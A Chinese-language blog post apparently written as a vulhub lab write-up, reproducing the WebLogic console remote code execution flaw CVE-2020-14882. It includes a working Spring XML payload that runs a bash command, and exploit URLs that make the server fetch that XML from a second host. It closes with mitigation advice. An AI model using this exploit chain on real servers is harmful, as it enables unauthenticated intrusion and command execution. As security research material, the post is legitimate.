【vulhub】Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882)漏洞复现

最新推荐文章于 2023-03-11 10:59:45 发布
最新推荐文章于 2023-03-11 10:59:45 发布
阅读量383 收藏 2
点赞数
分类专栏: vulhub 文章标签: weblogic
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/115586687
版权

写在最前面!

本来是写好的了,但是中途突然死机,而且没有保存。。。就这样一天的心血全部消失了。。。
这样我就不得不重新写了,但是你们也知道,
重新写有好痛苦。。。
好比你写一篇作文, 快写完了
但老师说你字潦草把作业撕了让你重新写一遍
虽然你记得开头和内容但你也懒得写了
因为一篇文章花光了你所有精力
只差一个结尾却要你从头来过。
。。。。

这里我就不写多的了,直接看2篇参考文章。

https://www.cnblogs.com/backlion/p/13951858.html
https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md
除了我没写https://www.cnblogs.com/backlion/p/13951858.html这篇文章的# 四、手工提交利用方式一其他都写了。

其中FileSystemXmlApplicationContext()函数写入后门文件的方法有错,我参考https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2020-14882/README.zh-cn.md重新写了(看最下图)

这里推荐用火狐浏览器

因为,其他浏览器,会跳转到历史地址
在这里插入图片描述

windows下通过FileSystemXmlApplicationContext()函数写入后门文件(weblocig_12版本)

尝试通过FileSystemXmlApplicationContext()加载并执行远端xml文件:
poc.xml如下:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[echo 2333 > /u01/oracle/wlserver/server/lib/consoleapp/webapp/images/xxx.txt]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

然后通过如下URL,即可让Weblogic加载这个XML,并执行其中的命令:

http://192.168.100.23:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.100.23:8000/poc7.xml")

在这里插入图片描述
通过此方法,windows可以往images路径下写文件,写入路径为:

/u01/oracle/wlserver/server/lib/consoleapp/webapp/images/xxx.txt

访问http://192.168.100.23:7001/console/images/xxx.txt
在这里插入图片描述

weblogic 10 写入后门

因为com.tangosol.coherence.mvel2.sh.ShellSession这个gadget,只存在于weblogic 12,weblogic10 并没有这个gadget(没有包),所以无法使用
需要使用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext来执行,所有Weblogic版本均适用。
http://ip:7001/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://server ip :8000/poc.xml”)

漏洞修复

尝试复现的时候发现/console/consolejndi.portal路径也可以触发,所以

至少禁止以下路径的访问。或者直接禁止访问console。

/console/console.portal
/console/consolejndi.portal
或者通过官方下载补丁,这里需要正版授权才能下载
升级官方补丁:https://www.oracle.com/security-alerts/cpuoct2020.html

樱浅沐冰
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-14882-Weblogic Console远程代码执行漏洞
战神/calmness的博客
10-30 955
目录 描述 影响 环境 过程 分析 修建议 描述 利用该漏洞在受影响的WebLogic Server上执行任意代码,没有进行身份的验证可以远程攻击者通过构造特殊的 HTTP GET请求的方式来进行攻击; 影响 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1..
vulhub-S2-008 远程代码执行漏洞-漏洞
wocao___的博客
02-22 535
S2-008 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1 测试环境搭建 docker-compose up -d 原理 S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模 式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生
Vulhub漏洞Weblogic(CVE-2020-14882)漏洞
一剑开天门!的博客
02-22 1716
Vulhub漏洞Weblogic(CVE-2020-14882)漏洞
Weblogic Console HTTP协议远程代码执行漏洞CVE-2020-14882)
chaojixiaojingang
10-30 4133
1.漏洞描述 未经身份验证的远程攻击者可通过构造特殊的 HTTP GE请求,利用该漏洞在受影响的WebLogic Server上执行任意代码。 2.影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Weblogic Server 14.1.1.0.0
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞(CVE202014882)
weixin_39745933的博客
12-11 407
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogicConsole控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6469
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞补丁
腾讯蓝军安全通告:WebLogic远程代码执行漏洞(CVE-2020-14645).pdf
09-18
腾讯蓝军安全通告:WebLogic远程代码执行漏洞(CVE-2020-14645) 安全建设 安全 安全众测 开发安全 网络与基础架构安全
h5sconsole:H5S视频平台管理Web界面
05-24
h5sconsole-h5stream的管理Web界面 构建设置 # install dependencies npm install # serve with hot reload at localhost:6080 npm run dev # build for production with minification npm run build
vulhub漏洞Weblogic管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
weixin_45808483的博客
12-20 2829
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 漏洞环境
weblogic未授权访问漏洞CVE-2020-14882)
Armandhe的博客
06-07 4816
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
Weblogic管理控制台未授权远程命令执行漏洞cve-2020-14882/cve-2020-14883)
Bird&Bird
03-11 591
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修了两个安全漏洞,分别是CVE-2020-14882和CVE-2020-14883;CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
vulhubWeblogicCVE-2017-10271)漏洞
qq_45300786的博客
04-10 1168
背景介绍 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出反序列化漏洞,导致可执行任意命令。 启动vulhub里的weblogic服务 漏洞存在于以下路径:http://192.168.100.23:7001//wls-wsat/CoordinatorPortType11 漏洞 在攻击机用nc监听端口: 用burpsuite发送如下post报文。 (记得把ip(192.168.100.34)
Weblogic Unauthentication Remote Command Execution (CVE-2020-14882, CVE-2020-14883)
黑白的博客
12-06 447
声明 好好学习,天天向上 漏洞描述 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的
weblogic未授权命令执行漏洞(CVE-2020-14882)
weixin_45291045的博客
04-01 2958
文章目录漏洞概述漏洞影响范围环境搭建漏洞利用工具 漏洞概述 未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码漏洞影响范围 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Webl
CVE-2020-14882 Oracle WebLogic远程命令执行漏洞
dearya123的博客
06-28 2764
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 Oracle WebLogic Server Console 多版本存在安全漏洞,该漏洞使未经身份验证的攻击者可以通过HTTP访问网络,从而破坏Oracle WebLogic Server,受影响版本如下: 10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本,
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
最新发布
07-28
CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值